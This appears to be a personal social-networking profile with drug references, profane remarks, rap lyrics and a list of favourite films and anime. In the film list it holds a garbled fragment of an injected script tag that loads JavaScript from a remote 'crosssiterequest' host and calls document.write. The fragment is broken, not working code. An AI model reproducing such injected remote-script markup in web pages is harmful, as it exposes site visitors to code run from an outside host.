Tetra Hydro CannibanoL the physioLogicaLLy active chemicaL C21H30O2 from hemp pLant resin that is the chief intoxicant in marijuana most commonLy referred to as (thc)
and interesting things
friends, new friends, girLs/Ladies, reLatives i've yet to meet, new up and coming/underground bands/groups, the homies who rest in peace, tiLL we meet again, may the angeLs heLp you Lead the way, enemies... shit, i dont give a fuck, get at me... otherwise get bent... on the other hand im very sociabLe...
keep my name up out your mouth and we can keep it tha same
fuck friends... i need a homie that know me when aLL these muthafucken cops be on me...
network of individuaLs poorLy retrofitted as a popuLarity contest...
'With all this extra stressin' tha question I wonder is after death I feel my last breath when will I finaly get to rest from this supression they punish tha people that's askin questions and those that possess steal from tha ones without possesions tha message I stress to make it stop study your lessons don't settle for less even tha genius asks questions be greatful for blessins don't ever change keep your essense tha power is in tha people and tha politics we address always do your best don't let this pressure make ya panic and when ya get stranded and things don't go tha way ya plannd it' R.I.P ~Pac 'just puLL out the nine, pop in the cLip and Let one sLip, hmph... into these crazy fooLs' R.I.P brad nowell of SUBLIME 'music makes me high' R.I.P mr cheeks of LOST boyz
fear and Loathing in Las vegas... psychodeLic.- - haLf baked, viewed over 50 times- - what dreams may come- -casino (shroomed out) -0- manga- - japanime- - dBz/gt- - cowboy bebop the movie- - metropoLis- - akira- - gowcaizer- - yotoden/wrath of the ninja- - X- - shaun of the dead funny as shit... Like nasty smeLLy shit hahah .... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document·write("...mov.r{}");}..
woLverine- hes been through heLL aLL his Life and, Like a vigiLante, finds his own suitabLe punishment for these dirty LowLifes.....